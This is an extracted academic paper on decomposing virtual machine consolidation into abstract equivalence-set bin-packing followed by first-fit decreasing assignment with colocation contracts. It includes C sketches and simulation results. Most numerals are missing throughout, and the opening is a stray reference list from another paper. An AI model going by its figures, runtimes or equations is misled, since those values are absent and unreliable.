recognition of arabic numerals with grouping and ungrouping using back propagation neural network. in: international conference on pattern recognition, informatics and mobile engineering (prime). piscataway: ieee, – . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . . takruri m, al-hmouz r, al-hmouz a. . a three-level classifier: fuzzy c means, support vector machine and unique pixels for arabic handwritten digits. in: computer applications & research (wscar), world symposium. piscataway: ieee, – . xu qs, liang yz. . monte carlo cross validation. chemometrics and intelligent laboratory systems ( ): – doi . /s - ( ) - . younis ks. . arabic handwritten character recognition based on deep convolutional neural networks. jordanian journal of computers and information technology ( ). palatnik de sousa ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /info http://dx.doi.org/ . / - - - - _ http://arxiv.org/abs/ . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. submitted july accepted february published february corresponding author eli m. dow, emdow@us.ibm.com academic editor wolfgang banzhaf additional information and declarations can be found on page doi . /peerj-cs. copyright dow distributed under creative commons cc-by . open access decomposed multi-objective bin-packing for virtual machine consolidation eli m. dow industries and solutions, ibm research, yorktown heights, ny, united states department of interdisciplinary engineering science, clarkson university, potsdam, ny, united states abstract in this paper, we describe a novel solution to the problem of virtual machine (vm) consolidation, otherwise known as vm-packing, as applicable to infrastructure-as- a-service cloud data centers. our solution relies on the observation that virtual ma- chines are not infinitely variable in resource consumption. generally, cloud compute providers offer them in fixed resource allocations. effectively this makes all vms of that allocation type (or instance type) generally interchangeable for the purposes of consolidation from a cloud compute provider viewpoint. the main contribution of this work is to demonstrate the advantages to our approach of deconstructing the vm consolidation problem into a two-step process of multidimensional bin packing. the first step is to determine the optimal, but abstract, solution composed of finite groups of equivalent vms that should reside on each host. the second step selects concrete vms from the managed compute pool to satisfy the optimal abstract solution while enforcing anti-colocation and preferential colocation of the virtual machines through vm contracts. we demonstrate our high-performance, deterministic packing solution generation, with over , vms packed in under min. we demonstrating compara- ble runtimes to other vm management solutions published in the literature allowing for favorable extrapolations of the prior work in the field in order to deal with larger vm management problem sizes our solution scales to. subjects autonomous systems, operating systems keywords virtual machine management, consolidation, iaas introduction and motivation the primary contributions of this work are the construction of an efficient algorithm for packing virtual machines densely in an infrastructure-as-a-service (iaas) data center. 
reducing the number of physical hosts is one way to reduce costs of cloud computing data centers by limiting the power and cooling needs of servers that need not run at full capacity when workloads can be run on a subset of the total available hardware. as has been demonstrated in the literature, powering down hosts completely is generally not ideal given the dynamic nature of cloud computing workloads. consider that some number of individual cloud servers may participate in distributed services that necessarily preclude turning the machines off entirely due to response requirements when serving file contents. though shutting hosts off completely is not an option in all cases, idle machines can be placed into a low power state to achieve much of the benefits described earlier (isci et al., ; zhang et al., ). similar concepts have been applied to the persistent how to cite this article dow ( ), decomposed multi-objective bin-packing for virtual machine consolidation. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:emdow@us.ibm.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. disk volumes supporting storage networks for clouds (narayanan, donnelly & rowstron, ). this effort is also supplementary to an ongoing cloud management framework being developed by our research group specifically to suit small-to-medium business- sized iaas compute clouds. average data center server utilization is reportedly estimated to be around % (± %) (united states environmental protection agency, ). research shows that such low utilization is inefficient because even idle servers may consume more than % of their peak power requirements (gandhi et al., ). the result of these findings is the implication that data centers should strive to have fewer servers running at close to peak utilization if they want to be efficient and more competitive on cost pricing. an obvious solution to drive down cloud compute cost is therefore to consolidate cloud compute resources (virtual machines) onto the minimum number of host servers. many of the previous efforts to describe solutions to infrastructure-as-a-service (iaas) virtual machine packing stem from previous analyses and solutions to general purpose bin-packing type problems. conceptually it works by assuming each vm is allocated some fixed share of the physical host’s compute resources. examples of those fixed resources include the number of logical cores on a multi-core host, or the fractional allocation of the host’s total available memory and persistent storage. many of these approaches are variations on the theme of multi-dimensional bin-packing approach (campegiani & lo presti, ; panigrahy et al., ). others are based on genetic algorithms such as gu et al. ( ), campegiani ( ), and still others on market based systems (lynar, herbert & simon, ). our goal is to design a consolidation placement algorithm that is high performance and suitable for small-to-medium business-sized virtual machine data centers on the order of a few hundred virtual machines spanning fewer than hosts. we focus on this demographic for two reasons. the first is because of the tractability of the problem. the second is because the medium sized business users are less likely to opt for exorbitant hardware capital expense to maintain performance while attempting some level of consolidation. 
measurements on google, amazon, and microsoft cloud service platforms demonstrate revenue losses ranging from to % (greenberg et al., ; kohavi, henne & sommerfield, ; schurman & brutlag, ) due to consolidation induced latency. as such, the super large data centers often under consolidate intentionally to maintain response times. in google data centers, for instance, it has been reported that consolidated workloads make use of only half of the available compute cores on the hardware (mars et al., ). every other processor core is left unused simply to ensure that performance does not degrade. small-to-medium business (smb) operations on the other hand, may be less cost sensitive to minute latency introductions, especially if they are supporting internal private cloud data centers on premises. prior solutions for general bin packing when considering the existing solutions to virtual machine consolidation placement, it is reasonable to conclude that the problem is most similar to bin-packing solutions. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. stated in terms of the classical bin packing problem, virtual machine consolidation is stated as such: given a set i ={ ,...,n}of items, where item i∈ i has size si ∈ ( , ] and a set b={ ,...,n}of bins with capacity one. find an assignment a: i →b such that the number of empty bins is maximized. the problem is known to be np-complete. further it has been shown that there is no ρ-approximation algorithm with ρ < / for bin packing unless p =np. in other words, consider a finite collection of n weights called w(w ,w ,w ,...,wn), and a collection of identical bins with capacity c (that necessarily must be larger than the maximum individual weight from the set w), what is the minimum number (k) of bins required to contain all the weights without exceeding the bin capacity c? setting aside the mathematical formulation, we are interested in the fewest bins required to store a collection of items. this variant of the bin-packing problem is known as the - dimensional ( -d) bin packing problem. note that it is important to keep in mind that ‘‘weights’’ here are necessarily formulated as indivisible atomic values. the weight of an object being placed must fit entirely within the remaining capacity of a container and may not be subdivided. approximation solutions to the bin packing problem usually make use of heuristic approaches, with the two most relevant solutions being next-fit, and first-fit decreasing. next-fit in the next-fit algorithm, all bins are initially considered to be empty. beginning with bin j = and item i= , if bin j has residual capacity for item i, assign item i to bin j via an assignment function a, i.e., a(i)= j. after an assignment is made, simply consider the next item (i+ ) until exhausting all items. if there are items that still require packing, consider bin j+ and item i. this process continues until the last item is assigned (packed). the major drawback of the next-fit algorithm is that the approach does not consider a bin after it has been processed once and left behind. this can lead to wasted capacity in those bins that are not revisited, and thus there is room for finding a better approximation solution. first-fit decreasing one solution to the drawbacks inherent in next-fit, is to employ the following algorithm. at the start, consider each of k bins as empty. 
beginning with bins k = and item i= , consider all bins j = ,...,k and place item i in the first bin that has sufficient residual capacity (i.e., a(i) = j). if there is no such bin available, increment k and repeat until the last item n is assigned. this form of first-fit provably uses at most / ∗ k bins, where k is the optimal number of required bins for a perfect solution (johnson et al., ). however, there are further refinements to the algorithm that should be considered. the simple intuition behind first-fit decreasing is that if you first reorder the items such that s1 ≥ ··· ≥ sn before applying the general first-fit algorithm, you can obtain a superior result. intuitively, this is because the conceptually ''larger'' items, in our case the vms with large resource consumption, are less likely to fit onto a single bin (host), so we place each of the large resource consumers first, using the residual space to pack in smaller virtual machines. first-fit decreasing runs in o(n ) time. multi-dimensional bin-packing a key concept in -d bin-packing is that a single unified weight is used as the driving input to the packing constraints. but in the real world, bin packing is often subject to multivariate constraints. consider trucks being packed with boxes for shipment. we could use a d bin-packing approach based on box weight and the shipping weight of a fleet of trucks, but this does not work out well in practice because boxes have a three-dimensional volume to consider in addition to a weight; simply consider many small but very heavy boxes, or a few light boxes that are voluminous, and things become more complicated. hierarchical multi-objective bin packing for virtual machines our solution to packing virtual machines is predicated on two major observations. the first is that most virtual machine cloud providers offer fixed-size virtual machines at varying cost structures. at the time of this writing amazon, one of the largest cloud computing hosts for iaas virtual machines, offers vm sizes in small, medium, large, extra-large, double-extra-large, and quadruple-extra-large capacities, each with its own pricing according to a tiered cost structure. this means that, in some sense, virtual machines belonging to the same capacity and cost structure tier can be considered equivalent for the purposes of packing assignment. the intuition here is that virtual machine packing in a cloud data center is definitely a multi-dimensional bin-packing type of problem where the constraints are related to the host capacities and the virtual machine consumption requirements of memory, cpu, disk i/o, and networking. our formulation of the bin packing problem, as it applies to virtual machines, is as follows. given a host with overall hardware capacity c, we can represent that capacity as a tuple of the individual resources that comprise c, for instance cpu, ram, and io as constituent individual capacities ci, and formalize the capacity of a host as c = {c1, c2, c3, ..., cn} s.t. ∀ ci ∈ c, ci ≥ 0, where, for example, c1 might represent the physical cpu capacity of the host, c2 the ram capacity of the host, and c3 the i/o capacity of the host with capacity tuple c. a virtual machine v can similarly be defined as a tuple of the resources required for the operation of that vm, according to the same resource cardinality used to describe the resource capacities of a host.
as an example: v = {v1, v2, v3, ..., vn}. the value v1 represents the cpu requirement of virtual machine v, v2 similarly represents the ram requirement of the vm, and v3 represents the i/o requirement of the virtual machine v. with this formalism we can further say that a given host is considered over-constrained if, for any resource, the cumulative vm utilization exceeds a maximum percentage τ of the physical resource. if no oversubscription of resources is allowed by the virtualization platform, 0 < τ ≤ 1; if oversubscription of resources is permissible, 0 < τ ≤ τmax, where τmax is the maximum oversubscription threshold allowed. there is thus a tuple defining the per-host (c), per-measured-resource utilization/over-constraint percentages (τi) of the form τc = {τ1, τ2, τ3, ..., τn}. accordingly, each measured resource may have a τmax defined with the same cardinality as c and v that denotes the maximum per-resource utilization/over-constraint percentage for that resource. we thus define functions to retrieve the over-constraint factor as follows: τ(c,i), which is alternatively written as τc[i] using array indexing notation, along with τmax(c,i), which is alternatively written as τmaxc[i], where c remains a specific host instance and i remains the index of some measured resource. if there are k virtual machines assigned or allocated to a given host c, the boolean packing allocation p(c) is defined as follows: p(c) = 1 if, for every measured resource i, the summed demand of the k allocated vms satisfies v1[i] + v2[i] + ... + vk[i] ≤ ci · τ(c,i) ≤ ci · τmax(c,i); and p(c) = 0 if the summed demand for some resource i exceeds ci · τ(c,i). the general bin packing problem attempts to solve for the minimum number of hosts n such that ∀ vi ∈ v, vi is placed on some host cj ∈ c. hosts that contain some number of packed vms form the set c′, with c′ ⊆ c. any hosts not in c′ are unassigned or unused and may be powered down or put into a low-power standby. thus, the goal of bin packing is to determine the smallest number n of hosts with one or more vms allocated such that the allocations are valid according to our packing validity function (p) above: minimize n subject to n = |c′| and ∀ cn ∈ c, p(cn) = 1. the problem with the general bin packing formulation is that it is computationally prohibitive to enumerate all possible packing solutions to perform this minimization, as the number of vm-to-host mappings explodes combinatorially. in contrast to previous virtual machine bin packing solutions, our approach first generates a generic, yet optimal, solution to a slightly different problem that relaxes the condition that each vm be considered
once this generic recipe for vm allocation is determined, it is concretely fulfilled from the actual list of distinct virtual machines being managed by employing a variant of first-fit decreasing (as described in ‘concrete vm allocation fulfillment). the first-fit decreasing approach selects concrete vm instances from the appropriate size peer-groups using a hierarchical multi-objective strategy, which is tunable, by the system operator depending on requirements. this latter multi-objective fulfillment is and integral part of our solution because we respect the notion that bad colocation selections can impair overall system performance. consider for instance the prior research on process colocation scheduling that uses previously measured performance degradations of possible combinations as input to colocation placement decisions to yield the lowest possible co-located degradation (jiang et al., ; jiang, tian & shen, ; tian, jiang & shen, ). this work was improved upon and made more relevant to the class of virtual machine consolidation problems by an approach that enabled an explicit, tunable performance bound in pacman (roytman et al., ) as a goal for consolidation. however, the work in pacman required initial placement to be on lightly consolidated servers (conservative placement in their terminology), for a period of time while observations were made to determine colocation impact characteristics on the vm. the authors of the pacman system used – min as example batch periods for this purpose. in contrast, our goal was to build something that can perform vm consolidation packing almost continuously (every few minutes), with low resource usage. constructing an ideal solution template to construct a template for what the ideal packing solution should look like, our algo- rithm uses a dynamic programming style solution. the first step is to discretize the virtual machines to be packed into a set of equivalence combinations. equivalence here means more or less the same computational requirements. for instance, if one is familiar with the amazon ec instance types, one could consider all instantiations of an ec instance type to be equivalent for the purposes of virtual machine bin packing. in some situations, the size of equivalence sets combinations are known a priori because virtual machines are cloned from templates, or golden master images and then customized for each unique deployment. in general, one can consider our algorithm as ‘‘off-line’’ in bin-packing parlance because we know the sizes of all containers and all objects to be packed prior to running the algorithm. the equivalence set can be represented by an ordered tuple consisting of the largest, per-vm resource consumption parameters from each element in the set. for instance, dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in our experimentation we used the following notation to describe an equivalence set: ‘‘m:: c:: n:: s:: e:: ’’ which describes the set of instances containing gb ram, eight logical cpu cores, two network compute units, a single set holding of two concrete elements (vms) in total. later versions of this software were enhanced to more specifically separate out the network values into a cumulative total, as well as constituent read and write capacity. the same approach was also implemented for disk i/o, but has been omitted from the examples for brevity. 
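the equivalence-set summary just described, an ordered tuple holding the largest per-vm consumption observed on each dimension together with the number of concrete elements it stands for, maps onto a small structure. this sketch reuses the illustrative vm_t and dimension definitions from the earlier sketch; the names are again assumptions rather than the types from the actual implementation.

/* an equivalence set is summarized by the largest per-vm demand observed on
   each measured dimension plus the number of concrete vms it stands for      */
typedef struct {
    const char *name;                   /* e.g. "micro", "small", ..., "qxl"  */
    double rep[NDIMS];                  /* representative (maximum) per-vm demand */
    int    element_count;               /* concrete vms summarized by this set */
} equiv_set_t;

/* fold one concrete vm into the set's representative demand vector           */
static void equiv_set_add(equiv_set_t *e, const vm_t *v)
{
    for (int d = 0; d < NDIMS; d++)
        if (v->req[d] > e->rep[d])
            e->rep[d] = v->req[d];
    e->element_count++;
}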
in situations where the equivalence sizes are not known ahead of time, one can opt to perform a clustering approach to define equivalence groupings, and thereby limit the groupings to a suitably small number of equivalence combinations so as to make this approach viable. once a cluster is defined using a technique such as k-means clustering one can define the equivalence set to be each vm in the grouping. likewise, the hosts in the cloud data center can be partitioned into equivalence sets. hosts belong to the same equivalence set when any two hosts in the set are considered logically equivalent to each other in terms of capacity. when large cloud providers procure machines, they are often purchased several at a time according to the same specification, thereby lending itself to this approach well. in situations where hosts are not identical machines, system administrators can broadly lump together machines with similar compute capabilities. the algorithm begins by looking at each of the virtual machine equivalence combina- tions and examining the representative capacity. the algorithm then iteratively generates starting sets representing all possible combinations consisting of only virtual machines from the same equivalence (from the set of similarly sized vms) that are viable (would fit logically on the largest host to be filled). the limiting factor that governs the expansion of the starting sets is when the resource requirements grow too large to fit on the largest capacity host. consider the following example of this is unclear: assume the largest capacity host has gb of ram, and the smallest element from an equivalence set of virtual machines, lets call that set the small instances, each require mb of ram. in this case, the starting sets produced from the small instances would be the following trivial generation: ×small, ×small, ×small, and ×small as each set would cumulatively require , , , and , mb of ram, respectively. no larger grouping of small instances would fit on the largest host. these starting sets represent some initial candidate equivalence combinations to consider. naturally, we extend this to include an oversubscription parameter for each resource dimension (ram, cpu, disk i/o, networking i/o, etc.) that allows the resource to be oversubscribed on a per-host basis. from the example above, considering no over- subscription for ram, we would have generated all four of the possible instantiations enumerated. each element in the starting set represents an abstract combination from the small-vm set that could be satisfied by concrete virtual machines that are considered equivalent. we further limit the generation of abstract combinations to ensure that combinations respect each dimension of resource under consideration. for instance, in the running dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. example there might actually only be three abstract combinations generated due to the cumulative i/o or cpu requirements of the abstract grouping as compared to the host capacity. we also limit the abstract combinations to contain no more of an equivalence set than the concrete instances. in other words, we do not generate something like ×small if there are in fact only instances of the small vm size to be packed. the algorithm proceeds through each vm equivalence set (e.g., micro, small, medium, lg, xl, xxl, qxl) generating all possible combinations of abstract vms that could reside on the largest host on the network. 
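the trivial generation of starting sets illustrated above (1x, 2x, 3x, ... of a single class until the largest host would be exceeded on some dimension, or until the concrete instances of that class run out) can be written directly; as before, the types come from the earlier sketches and the function name is an assumption.

/* enumerate the viable "count x class" starting sets for one equivalence
   class; generation stops when the cumulative demand would exceed the largest
   host on any dimension (respecting its over-constraint factors) or when no
   further concrete instances of the class remain                              */
static int starting_sets(const equiv_set_t *cls, const host_t *largest,
                         int concrete_available, int *counts, int max_counts)
{
    int n = 0;
    for (int count = 1; count <= concrete_available && n < max_counts; count++) {
        bool fits = true;
        for (int d = 0; d < NDIMS; d++) {
            if (cls->rep[d] * count > largest->cap[d] * largest->tau[d]) {
                fits = false;
                break;
            }
        }
        if (!fits)
            break;                      /* larger multiples of this class cannot fit */
        counts[n++] = count;            /* record "count x class" as a starting set  */
    }
    return n;                           /* number of starting sets produced          */
}

the cross-class expansion described next then combines these per-class starting sets, discarding any combination that exceeds the largest host on any measured dimension.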
this process of creating starting sets, when used with a relatively small number of equivalence sets (the order of or so), completes virtually instantaneously on modern machines. the number of starting sets is on the order of the number of virtual machine categories (equivalence sets provided as input). with the completion of the generation of all abstract starting sets, we rigorously generate the exhaustive permutations of abstract, but viable, packing solutions. expansion proceeds as follows. assume that labels a, b, c, and d are labels for each of the generated equivalence sets. at step the table of combinations could be listed as follows with a row dedicated to each known set where it must be strictly followed that a < b < c < d where the < operator is a standardized comparator, in our case ram consumption: a b c d at the next iteration, each row is combined with all elements below it: a, ab, ac, ad b, bc, bd c, cd d continuing in this fashion on a second iteration: a, ab, ac, ad, abc, abd, acd b, bc, bd, bcd c, cd d and the final iteration yields the complete permutation list: a, ab, ac, ad, abc, abd, acd, abcd b, bc, bd, bcd c, cd d as expected, we get values from the original . this is because we are computing the combinations of p( , )+p( , )+p( , )+p( , ) following the standard p(x,y) dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. meaning ‘‘permutations of x values by choosing y elements.’’ this is because, strictly speaking, virtual machine packing is a permutation problem not a combination problem since the meaning of a generic assignment solution that says: ‘‘ large vms and small vm’’ is semantically identical to ‘‘ small vm and large vms.’’ order does not matter, and repeats are not possible. in reality we do not have single elements on each starting row however we have the starting sets expanded from the singleton abstract vms. each of the starting sets’ elements are combined with every element not from its own starting set modulo invalid permutations. invalid permutations limit the state expansion due to the limitation that candidate permutations must remain dimensionally smaller than the largest host (note that smaller here means that the candidate solution permutation must be constrained by each compute resource dimension being observed). we compute the exhaustive solution of abstract permutations using a dynamic programming approach. by sorting the list of candidate solution recipes hierarchically as they are generated (for instance by cumulative memory requirement, then by cumulative cpu capacity required, etc.) we can eliminate much of the needless state expansion in computing all possible combinations through short circuit evaluation. the general worst-case runtime of computing bin-packing solutions, via an exhaustive computation of vm to host mapping possibilities is shown in eq. ( ): o ( n ) ( ) where n is the number of vms and k is the number of host servers. instead, we compute something with complexity: o ( n∑ i= n! (n−i)! ) . ( ) in eq. ( ), we can see runtime of permutation combination based on virtual machine placement equivalence. in eq. ( ), n is the size of the set of equivalence combinations (in other words the number of vm instance types in amazon parlance), and i is simply the counter from to n. alternatively, we could consider that this approach runs in time: o ( nk ) . 
( ) equation ( ) is an example of a second formulation of the runtime of permutation computation based on virtual machine placement equivalence. in eq. ( ), the value of n here is once more the size of the set of equivalence permutations (i.e., the number of vm instance types from amazon). since we know that the n here is strictly speaking a much smaller value than the n from eq. ( ) the base improvement shows a potential for speedup assuming k is greater than or equal to . considering that the exponent term in eq. ( ) is a constant value of rather than the size of the number of hosts as compared to the exponent in eq. ( ), this comparison of exponential terms suggests a massive speedup in computation time for the abstract solution as compared to the exhaustive concrete dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. solution for all situations where the data center has more than two hosts. the resulting implication is that the ability to compute the general form of a vm packing solution, if not the exact solution in light of equivalence partitions among the virtual machines is a reasonable strategy to pursue. note that during our experimentation we sorted the generated candidate solutions primarily on memory as it is shown in the literature to be the principal limiting factor in virtual machine consolidation (tulloch, ; vmware, inc, ). the approach of generating the candidate recipe of what the ideal vm to host mapping solution should look like in the abstract is substantially faster than computing all possible concrete combinations of virtual machine assignments. note that, at this point, when abstract solution generation is complete we are left with only a partial solution to the vm consolidation problem that informs us of what the ideal consolidation should look like in the abstract (e.g., ×small, ×medium, ×xl). however, as we will see in the next section, the choice to defer the actual runtime solution of concrete vm assignment to a second processing phase is advantageous. concrete vm allocation fulfillment after phase one is complete and all candidate equivalence combinations have been generated, we now proceed to the concrete assignment phase. in this phase we begin by iterating through the list of hardware hosts. the list of hardware hosts is sorted in largest to smallest capacity. we iterate through the sorted list of largest to smallest equivalence set permutations, assigning the first permutation that is satisfiable by the remaining, unassigned concrete vm instances. in essence this makes our algorithm a derivative of first-fit decreasing since we always fill the ‘‘largest’’ hosts first, with the ‘‘largest’’ equivalent set it can hold. once an equivalence set is found that fits the host being filled, the satisfier tries to locate concrete vm instances according to that equivalence set specification. if the set is not satisfiable (i.e., the equivalence set selected indicated large vms and there are only remaining) we simply remove the candidate set from the list, and advance to the next ‘‘largest’’ candidate equivalence set. note that largest here means the biggest according to our multi-objective comparator function used to sort the lists prior to satisfaction time. in the assignment phase of consolidation, we have a roadmap for what the ideal consolidation should look like, but we still need to assign concrete virtual machine instances to each host that are representative of the plan. 
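before turning to how individual instances are selected (taken up immediately below), it is worth noting that the skeleton of this fulfillment phase is classic first-fit decreasing. a self-contained one-dimensional version of that skeleton, over a single weight such as ram, is sketched here with the hierarchical multi-objective comparator and colocation handling deliberately abstracted away; it illustrates the underlying ffd idea rather than the fulfillment code itself.

#include <stdlib.h>

/* classic one-dimensional first-fit decreasing: sort items largest-first,
   then place each item into the first bin with sufficient residual capacity,
   opening a new bin when none fits; returns the number of bins used, or -1
   if an item can never fit or max_bins would be exceeded                     */
static int cmp_desc(const void *a, const void *b)
{
    double x = *(const double *)a, y = *(const double *)b;
    return (x < y) - (x > y);           /* descending order                    */
}

static int first_fit_decreasing(double *items, int n, double bin_cap,
                                double *residual, int max_bins)
{
    int bins = 0;
    qsort(items, n, sizeof(double), cmp_desc);
    for (int i = 0; i < n; i++) {
        if (items[i] > bin_cap)
            return -1;                  /* item larger than any bin            */
        int j = 0;
        while (j < bins && residual[j] < items[i])
            j++;                        /* first bin that still fits           */
        if (j == bins) {                /* no open bin fits: open a new one    */
            if (bins == max_bins)
                return -1;
            residual[bins++] = bin_cap;
        }
        residual[j] -= items[i];
    }
    return bins;
}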
to do this, in theory, we could simply select any vm from the equivalence set specification (i.e., any small vm is as good as any other). however, in practice we opt to use this opportunity to fulfill some hard and soft colocation/anti-colocation preferences expressed in vm contracts. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. listing : example virtual machine definition with contract extensions. the colocation_constraints block demonstrates a single blacklisted host along with vms for preferential colocation if possible. <contract id="ubuntuvm"> <ruleset type="vmm-libvirt"> <domain type="kvm"> <name>ubuntu</name> <uuid> c e f- a -c - -f d b ec </uuid> <memory> </memory> <currentmemory> </currentmemory> <vcpu> </vcpu> <os> <type arch=’x _ ’ machine=’pc’>hvm</type> <boot dev=’hd’/> </os> <features> <acpi/> </features> <clock offset=’utc’/> <on_poweroff>destroy</on_poweroff> <on_reboot>restart</on_reboot> <on_crash>destroy</on_crash> <devices> <emulator>/usr/bin/kvm</emulator> <disk type=’file’ device=’disk’> <source file= ’/home/deshantm/ubuntu-kvm/disk .qcow ’/> <target dev=’hda’ bus=’ide’/> </disk> <interface type=’network’> <mac address=’ : : : : :a ’/> <source network=’default’/> <model type=’virtio’/> </interface> <input type=’mouse’ bus=’ps ’/> <graphics type=’vnc’ port=’- ’ autoport=’yes’ listen=’ . . . ’/> </devices> </domain> </ruleset> <vmclassifier> <workload type=’cpu’/> </vmclassifier> <colocation_constraints> <blacklisted_colocation hosts= ’f d fae- dec- d -a - a c e b ’/> <preferential_colocation vms= ‘ b e- ac - d -ae d-b e ac f, a e e -a a - -b - f d b e ’/> </colocation_constraints> dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for instance, when selecting virtual machines we use a per-vm index of preferential colocation candidates and a per-vm set of anti-colocation constraints at satisfaction time. anti-colocation are resolved first as they are considered a hard requirement, while colocation, or affinity preferences, are considered optional and satisfied when possible given the other firm constraints. another aspect of our methodology is that we can then attempt more sophisticated placement systems such as load balancing across the consolidated hypervisors by using the actual runtime resource consumption of each virtual machine rather than just the nominal resource consumption maximums attributed to the equivalence group to which they belong. listing shows an example of a colocation constraint embedded in a virtual machine definition file for kvm as used in this research. an overall review of our two-phased decomposition of the virtual machine bin packing problem can be seen in algorithm . algorithm : two-phase decomposition of the vm bin-packing wherein physical compute resource constraints are resolved in an abstract solution phase and colocation constraints are resolved during the second phase of concrete vm assignment. consolidate (maxhost, {md}, {v}, {h}) enumerate equivalence sets {e} from the set of all vms {v} by method {e}=e({v}) expand singletons into singleton permutations: foreach i= to |{e}|do foreach abstract combination element e∈ei do {se}= singletonexpansion(e) append (ei,{se}) compute all permutations {p} over every element in {se}: for i= to |{se}|do p(|{se}|,i) considering all measured dimensions d,d ∈ {md}, discarding each permutation p ∈ {p} where size (pd) > capacity of the largest host (maxhost) on dimension d (maxhost(d)). 
apply first-fit decreasing algorithm with the set of hosts {h} as bins, and {p} as the elements to pack to determine a candidate allocation of abstract, equivalent vms to a host: if an element p∈ {p} is satisfiable by a single solution s then apply s. else if a set of elements {c} satisfy p ∈ {p}, then apply greedy heuristics for anti- colocation and colocation to select a concrete set of virtual machines c ∈ {c} note: the sub-steps in can be performed in such a way as to not generate invalid permutations and thereby reduce resource consumption at runtime. results to implement our algorithm, we began by outlining a small but efficient set of structures to encapsulate the state of a virtual machine based cloud datacenter. we implemented our software in the c programming language, using structs for objects representing the hard- ware machines and their physical limitations, as well as structs to represent the abstract virtual machines (something with a multidimensional size but no concrete identifier or dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. placement constraints attached). we also used a structure to represent equivalence sets, which were named lists of abstract vms with aggregate resource requirements. in total, the source code was just under , lines of commented c code as determined by the linux wc utility. once the vm and host information has been loaded from the preference file that describes the cloud to be modeled, the algorithm proceeds by enumerating all of the viable permutations of a single instance type. for instance, with the micro sized equivalence group modeled after amazon’s micro instance our enumeration of single- instance permutation would likely begin with the output as shown in listing . listing : example singleton permutation construction. [(micro: x )-m:: c:: n:: s:: e:: ] [(micro: x )-m:: c:: n:: s:: e:: ] [(micro: x )-m:: c:: n:: s:: e:: ] [...truncated for brevity ...] [(micro: x )-m:: c:: n:: s:: e:: ] [(small: x )-m:: c:: n:: s:: e:: ] [(small: x )-m:: c:: n:: s:: e:: ] [...truncated for brevity ...] [(qxl: x )-m:: c:: n:: s:: e:: ] the format is simply saying the singleton type is micro, the ×n notation indicates the number of instances, and the m, c, n, s, and e values represent the size of each of the memory, cpu, network, the number of sets in this combination (always in a singleton set), and the number of concrete vm elements making up the set. note, for simplicity of explanation, the dimension weights have been simplified to small, integer values. the listing might further continue for some time depending on the maximum capacity of the largest host or the maximum number of micro vm instances before continuing on to the small sized vms. as an example of performance of our two-phased approach to solution generation for vm bin-packing, we performed a variety of experiments using a custom written virtual machine-based data center simulator. our simulator is a linux-based c program written to model various servers of varying physical capacities along the resource dimensions studied herein (nic, ram, cpu, etc...) along with virtual machines of varying sizes with per dimension resource over-constraint parameters and oversubscription detection/pre- vention on a per-resource basis. all simulator development and experimental validation was performed on ibm r© blade center blades, each with -core cpus and gb ram and later runs were repeated, on a macbook pro with gb ram. 
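returning briefly to the singleton permutation listing above, one way such lines could be rendered is sketched below. it assumes the m/c/n fields are cumulative totals for the combination (the text leaves this implicit), reuses the illustrative equiv_set_t type from earlier, and is a formatting illustration rather than the simulator's actual output routine.

#include <stdio.h>

/* render one singleton permutation line in the style of the listing above,
   e.g. "[(micro: x4)-m::2048 c::4 n::2 s::1 e::4]"; the numeric values in
   this comment are invented purely for illustration                          */
static void print_singleton(const equiv_set_t *cls, int count)
{
    printf("[(%s: x%d)-m::%.0f c::%.0f n::%.0f s::1 e::%d]\n",
           cls->name, count,
           cls->rep[RAM] * count,
           cls->rep[CPU] * count,
           cls->rep[NET] * count,
           count);
}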
a simple xml configuration file specifying the virtual machines and hosts to be managed during the simulation governs the simulator. an example this configuration file is shown in the appendix. the configuration file inputs include the per-resource over-constraint value. overcommit is the oversubscription or over-allocation of resources to virtual machines dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table distribution of vms across seven equivalence sets from a representative moderate-scale ex- periment. vm equivalence set name concrete vm count micro small medium large xl dxl qxl with respect to the physical hosts maximum allocation of a particular resource. as an example, setting memory overcommit to means a : ratio of allowed cumulative vm memory consumption to the hosts physical ram. similarly, setting a cpu overcommit value of indicates scheduling up to two virtual cpu cores. decimal or floating-point values greater than one are accepted as valid inputs. in addition the configuration file for the simulation requires information about the largest host capacity for each measured resource, used for short circuit analysis when constructing abstract equivalence sets. in other words, the simulator enforces that no abstract solution is generated that has a cumulative individual resource consumption that exceeds the largest available host resource availability, for that resource (considering the previously specified over- constraint values for that resource). lastly, the configuration file shown in appendix includes information about the number of concurrent inbound and concurrent outbound migrations allowed as well as a cumulative migration maximum threshold per host. these migration threshold values are used for final solution post-processing that determines an automated live-migration based rearrangement plan to achieve a packed solution from an arbitrary starting state (vm to host allocation). the approach uses our previously described approach based on the well studied a∗ search algorithm to determine an automated migration plan (dow & matthews, ). in a sample experiment that consisted of expanding a grouping of concrete virtual machines as allocated according to table , we generated , , valid assignment permutations during the expansion phase (converting starting sets into all sets) in just s of wall clock time. a further s of wall clock time was used to perform final result sorting. a larger scale experimental parameterization is shown in table . during this exper- iment we performed a simulation of a large-scale cloud data center with , vms. in this larger scale experiment, there were starting sets generated, to ultimately create , , permutations, taking just over s to compute. a further s of wall clock time were required to sort the final output for concrete assignment. sorting optimizations were not investigated, though they contributed more than % of our overall solution runtime. dow ( ), peerj comput. sci., doi . /peerj-cs. / 